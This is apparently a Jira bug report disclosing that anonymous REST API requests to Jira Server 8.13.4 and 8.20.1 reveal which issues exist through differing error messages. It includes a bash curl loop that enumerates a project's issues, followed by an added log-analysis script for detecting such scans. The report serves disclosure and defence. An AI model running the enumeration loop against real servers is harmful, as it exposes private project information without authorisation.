- Bug
- Resolution: Fixed
- Low
- 8.13.4, 8.20.1
- 8.13
- Severity 3 - Minor
I detected that in on-prem JIRA with the REST API exposed, an attacker who knows (or discovers) the name of a project can enumerate the issues that exist in the project, all of this without being logged in to JIRA or having any credentials.
The response of the server changes when the issue exists on the system. For example, if the issue exists, the system returns this:
{"errorMessages":["You do not have the permission to see the specified issue.","Login Required"],"errors":{}}
And if the issue does not exist, the system returns this:
{"errorMessages":["Issue Does Not Exist"],"errors":{}}
The message changes depending on the language. For example, in Spanish, when an issue does not exist, the result was this:
{"errorMessages":["La Incidencia no Existe"],"errors":{}}
And when the issue exists, the result was this:
{"errorMessages":["Usted no tiene permiso para ver la incidencia especificada.","Se requiere identificación previa"],"errors":{}}
So a threat actor can enumerate the issues of a project automatically, as I show in the attached pictures, with a simple for loop in bash.
Tested in JIRA Server 8.20.1 and 8.13.4
The launched command was the following:
for i in {1..100}; do curl -s -X GET https://jira.site.es/rest/api/2/issue/PROJECTNAME-$i --output test$i.gz ; done && gunzip *.gz &>/dev/null ; ls | grep -v 'gz' | awk -F"" '{print "https://jira.site.es/rest/api/2/issue/PROJECTNAME-"$2}'
All the files that I could decompress as gz files had the message that I didn't have permission to access them, and the rest of them had the message that the incident does not exist.
You could maybe consider assigning a CVE to this issue.
I attach the screenshots as a link because I can't upload files:
Thanks.
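
A defender-side check for the pattern described in this report, as an added example that is not part of the original ticket: it scans an access log for clients that request many distinct issue keys of one project anonymously through /rest/api/2/issue/. The log layout (common log format), the sample lines with their addresses and status codes, the function names and the threshold are constructed assumptions.

```shell
#!/bin/sh
# Assumed log layout (adapt the field numbers to your proxy or access log):
#   client_ip ident user [timestamp zone] "METHOD path HTTP/x" status bytes
# where user is "-" for requests without an authenticated session.

# Print "client_ip PROJECT distinct_issue_count" for every client that asked
# for at least $1 distinct issue keys of one project while anonymous.
flag_issue_enumeration() {
    awk -v threshold="$1" '
        $3 == "-" && $7 ~ /^\/rest\/api\/2\/issue\/[A-Z][A-Z0-9_]*-[0-9]+$/ {
            key = $7
            sub(/^\/rest\/api\/2\/issue\//, "", key)   # e.g. PROJECTNAME-17
            project = key
            sub(/-[0-9]+$/, "", project)               # e.g. PROJECTNAME
            pair = $1 " " project
            if (!((pair, key) in seen)) {              # count each key once
                seen[pair, key] = 1
                distinct[pair]++
            }
        }
        END {
            for (pair in distinct)
                if (distinct[pair] >= threshold)
                    print pair, distinct[pair]
        }
    ' | sort
}

# Constructed sample log: one anonymous client walking PROJECTNAME-1..6,
# one logged-in user, and one anonymous client repeating the same key.
sample_log() {
    i=1
    while [ "$i" -le 6 ]; do
        printf '192.0.2.10 - - [10/Jan/2022:10:00:0%s +0000] "GET /rest/api/2/issue/PROJECTNAME-%s HTTP/1.1" 401 110\n' "$i" "$i"
        i=$((i + 1))
    done
    for n in 1 2 3; do
        printf '198.51.100.7 - alice [10/Jan/2022:10:01:0%s +0000] "GET /rest/api/2/issue/PROJECTNAME-%s HTTP/1.1" 200 5120\n' "$n" "$n"
    done
    for n in 3 3 4; do
        printf '203.0.113.5 - - [10/Jan/2022:10:02:00 +0000] "GET /rest/api/2/issue/PROJECTNAME-%s HTTP/1.1" 404 60\n' "$n"
    done
}

sample_log | flag_issue_enumeration 5
```

The check counts distinct keys rather than requests, so a client that reloads one issue link repeatedly is not flagged.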